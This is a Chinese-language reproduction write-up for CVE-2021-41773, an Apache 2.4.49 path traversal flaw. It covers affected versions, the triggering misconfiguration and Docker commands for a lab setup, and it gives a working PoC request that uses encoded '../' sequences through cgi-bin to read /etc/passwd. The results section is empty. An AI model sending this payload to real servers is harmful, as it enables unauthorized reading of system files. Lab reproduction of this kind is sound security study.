CVE-2021-41773 Apache 任意文件读取漏洞复现

一、软件介绍

  从Apache官方公告来看,攻击者可以使用路径遍历攻击将URL映射到预期文档根以外的文件。如果文档根目录以外的文件不受`require all denied`保护,则攻击者可以访问这些文件。

  Apache HTTP Server(简称Apache)是Apache软件基金会的一个开放源码的网页服务器,可以在大多数计算机操作系统中运行,由于其多平台和安全性被广泛使用,是最流行的Web服务器端软件之一。它快速、可靠并且可通过简单的API扩展,将Perl/Python等解释器编译到服务器中。

二、受影响版本

CVE-2021-41773 影响范围为2.4.49
CVE-2021-42013 影响范围为2.4.49/50

三、漏洞简述

此漏洞由不安全的配置触发,即,如果网站配置中,将 根目录 / 配置为

Require all granted

则可以通过cgi-bin/目录,配合

../

进行目录穿越,从而造成任意文件读取

注意: 此漏洞不影响默认配置,且只存在于2.4.49一个版本,影响有限。

四、环境搭建

docker pull vultarget/apache_httpd_readfile-cve_2021_41773:2.4.49
docker run -it -p 9999:80 --rm vultarget/apache_httpd_readfile-cve_2021_41773:2.4.49

五、验证Poc

GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

六、复现结果